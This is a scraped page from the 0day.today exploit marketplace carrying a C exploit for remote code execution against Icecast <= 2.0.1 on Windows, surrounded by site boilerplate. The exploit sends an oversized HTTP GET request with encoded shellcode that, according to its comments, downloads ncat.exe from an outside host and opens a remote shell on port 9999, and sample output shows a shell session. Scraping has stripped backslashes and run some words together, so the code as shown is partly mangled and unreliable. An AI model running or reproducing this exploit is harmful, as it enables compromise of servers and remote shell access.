0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Icecast <= 2.0.1 Win32 Remote Code Execution Exploit
==================================================== Icecast <= 2.0.1 Win32 Remote Code Execution Exploit ==================================================== /* by Luigi Auriemma Shellcode add-on by Delikon www.Delikon.de Because of all the forbidden bytes in a http get request i had to use a very small shellcode, which was blown up by Msf::Encoder::PexAlphaNum. Great encoder. ------------------------------------------------------------------------- C:>iceexec 127.0.0.1 Icecast <= 2.0.1 Win32 remote code execution 0.1 by Luigi Auriemma e-mail: aluigi@altervista.org web:http://aluigi.altervista.org shellcode add-on by Delikon www.delikon.de - target 127.0.0.1:8000 - send malformed data Server IS vulnerable!!! C:>nc 127.0.0.1 9999 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:Icecast2 Win32> --------------------------------------------------------------------------- */ #include <stdio.h> #include <stdlib.h> #include <string.h> #ifdef WIN32 #pragma comment(lib, "ws2_32.lib") #include <winsock.h> #include "winerr.h" #define close closesocket #else #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <arpa/inet.h> #include <netdb.h> #include <netinet/in.h> #endif #define VER "0.1" #define PORT 8000 #define BUFFSZ2048 #define TIMEOUT 3 #define EXEC"GET / HTTP/1.0rn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" "xcc" //web download and execution shellcode //which downloads http://www.elitehaven.net/ncat.exe //this ncat spwans a shell on port 9999 char shellcode[] = "xEB" "x03x59xEBx05xE8xF8xFFxFFxFFx4Fx49x49x49x49x49x49x51x5Ax56x54" "x58x36x33x30x56x58x34x41x30x42x36x48x48x30x42x33x30x42x43x56" "x58x32x42x44x42x48x34x41x32x41x44x30x41x44x54x42x44x51x42x30" "x41x44x41x56x58x34x5Ax38x42x44x4Ax4Fx4Dx49x4Ex4Ex4Cx42x30x42" "x50x42x50x4Fx35x4Ax4Ex48x55x42x50x42x30x42x50x49x48x43x4Cx42" "x45x4Ax46x50x58x50x34x50x50x4Ex4Ex4Ax4Ex42x36x42x50x42x30x42" "x30x41x43x49x4Cx48x56x49x4Bx4Fx36x50x46x41x55x4Ax56x45x57x44" "x57x4Ex36x4Dx46x46x55x4Fx4Fx42x4Dx42x45x4Ax46x48x43x4Cx41x4F" "x32x42x57x4Ax4Ex48x44x42x50x42x30x42x30x41x43x49x4Cx41x55x41" "x35x4Dx48x47x53x48x55x4Dx38x47x47x4Ax50x48x35x41x35x4Fx4Fx42" "x4Dx43x55x4Ax56x4Ax59x50x4Fx4Cx38x50x30x4Ax4Ex4Dx32x42x50x42" "x30x42x30x41x55x47x35x4Fx4Fx42x4Dx41x53x49x4Cx49x34x44x4Ex50" "x4Fx43x35x4Ax46x50x37x4Ax4Dx44x4Ex43x47x4Ax4Ex49x41x42x30x42" "x50x42x30x4Fx4Fx42x4Dx45x55x48x55x46x46x41x4Ax42x53x42x30x42" "x30x42x30x4Bx48x42x44x4Ex30x4Bx58x42x37x4Ex51x4Dx4Ax4Bx48x4A" "x56x4Ax30x49x58x4Ax4Ex50x45x4Dx55x43x4Cx43x35x45x45x48x55x47" "x35x4Bx48x4Ex46x46x42x4Ax31x4Bx58x45x54x4Ex33x4Bx58x46x35x45" "x30x4Ax57x41x50x4Cx4Ex4Bx38x4Cx34x4Ax41x4Bx58x4Cx55x42x52x41" "x50x4Bx4Ex43x4Ex45x43x49x54x4Bx48x46x53x4Bx48x41x50x50x4Ex41" "x53x4Fx4Fx4Ex4Fx41x43x42x4Cx4Ex4Ax4Ax43x42x4Ex46x37x47x50x41" "x4Cx4Fx4Cx4Dx50x41x30x47x4Cx4Bx4Ex44x4Fx4Bx33x4Ex37x46x52x46" "x51x45x47x41x4Ex4Bx48x4Cx35x46x42x41x50x4Bx4Ex48x56x4Bx58x4E" "x50x4Bx44x4Bx58x4Cx55x4Ex31x41x30x4Bx4Ex4Bx48x46x50x4Bx58x41" "x30x4Ax4Ex49x4Ex44x30x42x50x42x50x42x50x41x53x42x4Cx49x58x4C" "x4Ex4Fx55x50x35x4Dx45x4Bx55x43x4Cx4Ax4Ex4Fx42x4Fx4Fx4Fx4Fx4F" "x4Fx4Dx36x4Ax46x4Ax56x50x52x45x56x4Ax57x45x46x42x30x4Ax56x46" "x47x46x57x42x57x4Cx43x4Fx42x4Fx32x47x47x47x47x47x47x50x42x45" "x36x4Ex56x49x36x46x57x45x56x4Ax36x41x36x48x57x45x36x50x56x50" "x32x50x46x45x36x46x47x4Fx42x50x46x43x36x41x56x46x37x50x32x45" "x36x4Ax37x45x46x42x50x5A"; /* in my example 0xcc is used to interrupt the code execution, you must put your shellcode exactly there. You don't need to call a shellcode offset (CALL ESP, JMP ESP and so on) or doing any other annoying operation because the code flow points directly there!!! Cool and easy 8-) */ int startWinsock(void) { WSADATA wsa; return WSAStartup(MAKEWORD(2,0),&wsa); } int timeout(int sock); u_long resolv(char *host); void std_err(void); int main(int argc, char *argv[]) { structsockaddr_in peer; int sd; u_short port = PORT; u_charbuff[BUFFSZ]; UCHAR buf[4096]; UCHAR *pointer=NULL; setbuf(stdout, NULL); fputs("n" "Icecast <= 2.0.1 Win32 remote code execution "VER"n" "by Luigi Auriemman" "e-mail: aluigi@altervista.orgn" "web:http://aluigi.altervista.orgn" "nshellcode add-on by Delikonn" "www.delikon.de" "n", stdout); if(argc < 2) { printf("nUsage: %s <server> [port(%d)]n" "n" "Note: This exploit will force the Icecast server to download NCATn" "and after execution it will spwan a shell on 9999n" "n", argv[0], PORT); exit(1); } #ifdef WIN32 startWinsock(); #endif if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port= htons(port); peer.sin_family= AF_INET; memset(buf,0x00,sizeof(buf)); strcpy(buf,EXEC); pointer =strrchr(buf,0xcc); strcpy(pointer,shellcode); strcat(buf,"rn"); strcat(buf,"rn"); printf("n- target %s:%hun", inet_ntoa(peer.sin_addr), port); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); fputs("- send malformed datan", stdout); if(send(sd, buf, strlen(buf), 0) < 0) std_err(); if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) { fputs("nServer IS vulnerable!!!nn", stdout); } else { fputs("nServer doesn't seem vulnerablenn", stdout); } close(sd); return(0); } int timeout(int sock) { structtimeval tout; fd_setfd_read; int err; tout.tv_sec = TIMEOUT; tout.tv_usec = 0; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); err = select(sock + 1, &fd_read, NULL, NULL, &tout); if(err < 0) std_err(); if(!err) return(-1); return(0); } u_long resolv(char *host) { structhostent *hp; u_longhost_ip; host_ip = inet_addr(host); if(host_ip == INADDR_NONE) { hp = gethostbyname(host); if(!hp) { printf("nError: Unable to resolve hostname (%s)n", host); exit(1); } else host_ip = *(u_long *)(hp->h_addr); } return(host_ip); } #ifndef WIN32 void std_err(void) { perror("nError"); exit(1); } #endif # 0day.today [2024-12-25] #